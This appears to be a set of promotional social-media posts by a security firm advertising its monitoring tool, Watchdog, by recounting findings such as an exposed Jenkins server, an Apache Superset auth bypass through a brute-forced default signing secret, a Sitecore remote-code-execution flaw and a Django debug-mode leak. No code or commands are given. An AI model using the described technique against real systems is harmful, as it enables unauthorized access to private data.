Kahu Labs

??All your secrets are exposed to us. We are the guardians of the Digital Realm.?? Recently, our team at Kahu Labs uncovered multiple critical vulnerabilities in an organization's infrastructure using our attack surface monitoring tool, Watchdog. An open Jenkins instance was left publicly accessible, exposing the entire codebase, environment variables, log files, and even live API keys. ?? The Impact: Sensitive Data Exposure: Unauthorized access to confidential information. System Compromise: Increased risk of full-scale cyber attacks. Operational Disruption: Potential for significant downtime and financial loss. In today's rapidly evolving cyber landscape, constantly monitoring for vulnerabilities is a monumental challenge. One misconfiguration can open the door to malicious actors. That's where Watchdog comes in. Our continuous monitoring solution provides unparalleled visibility into your digital infrastructure, helping you identify and remediate vulnerabilities before they can be exploited. ?? Don't leave your secrets out in the open. ?? Reach out at [email protected] for a free scan today and take the first step towards securing your organization's cybersecurity posture. #CyberSecurity #KahuLabs #Watchdog #VulnerabilityManagement #DigitalSecurity

??? All your Secrets are belong to us: Beware of Default Configurations ?? One of the common ways organizations get compromised is by deploying publicly exposed applications with default configurations. Recently, Watchdog discovered an Apache Superset Auth Bypass and admin account takeover by exploiting CVE-2023-27524 on a production instance hosted by a client at https://lnkd.in/d9eJQaSt. By brute-forcing the secret used to sign authentication tokens for users of Superset, we gained admin access. This allowed us to access the complete production database of AnonCorp, containing highly sensitive data like: ?? Email addresses ?? Phone numbers ?? Physical addresses ?? AUM amounts ?? Sales performance metrics ?? Monthly P&L statements Impact: Unauthorized access to sensitive user data Potential financial loss and reputational damage Compliance violations and legal repercussions Mitigation: Do NOT use default configurations for secrets on any publicly exposed instance. Regularly update and patch your applications. Implement strong secret management practices. Lessons Learned: Continuous visibility into your inventory and security configurations is crucial. Regular security assessments help identify and mitigate vulnerabilities before they are exploited. At Watchdog, we understand the challenges businesses face in maintaining security. We're offering a FREE scan and visibility into your cybersecurity posture. Reach out to us today to ensure your organization is protected against such vulnerabilities. ?? Don't let misconfigurations be your downfall. Secure your applications now! #CyberSecurity #DataProtection #VulnerabilityManagement #Watchdog #StaySecure #SecureYourBusiness #CyberSafeWithWatchdog #CyberAwareness

?? All your secrets are belong to us! ?? At Kahu Labs, we've been working on a revolutionary attack surface monitoring tool called Watchdog ??. In one of our recent scans of a client’s infrastructure, Watchdog uncovered a critical vulnerability that could have led to a complete system takeover. The vulnerability (CVE-2023-35813) was found in a web application built on Microsoft ASP.NET, using Sitecore Experience Manager. This flaw allowed for remote code execution, leaving the system open to attack. We immediately verified the issue, notified the client, and shared a Proof of Concept (PoC) exploit to take the system offline for patching. This vulnerability has been public since September 2023, yet many companies still run outdated software, risking major breaches. Cybersecurity is a constant battle in today’s world, and we at Kahu Labs help our clients win that battle! ??? Watchdog helps organizations maintain visibility into their digital assets, identify vulnerabilities, and mitigate risks before they escalate. ?? Want to know how secure your organization is? Reach out to us at [email protected] and let’s talk about strengthening your cybersecurity posture! #CyberSecurity #AttackSurfaceManagement #RemoteCodeExecution #KahuLabs #Watchdog #Sitecore #CVE202335813 #DigitalAssets #CyberResilience

"All your secrets are belong to us." ???? What happens when you leave debug mode on in your production Django app? A GenAI startup recently found out the hard way, with their production app leaking highly sensitive data—MongoDB credentials, Google OAuth secrets, OpenAI keys, email host details, and more. Thankfully, Watchdog found the origin IP and detected this critical misconfiguration before the wrong hands could reach it. We quickly reached out, and the vulnerability was patched, saving the company from a potential disaster. ?? Reminder: Leaving debug mode enabled on any public-facing asset—especially in production—is never a good idea. This simple oversight can expose your most critical secrets and put your organization at significant risk. With cyber threats constantly evolving, it’s a daily challenge to keep your organization’s security airtight. This is where Watchdog comes in. Our continuous monitoring solution provides real-time visibility into your cybersecurity posture, so you can stay protected. ?? Want to know where you stand? Reach out to us at [email protected] to assess your cybersecurity readiness. Don’t let the secrets slip. Stay secure with Watchdog. ??? #Cybersecurity #GenAI #CyberResilience #Watchdog #KahuLabs #StaySafe #DataProtection #Django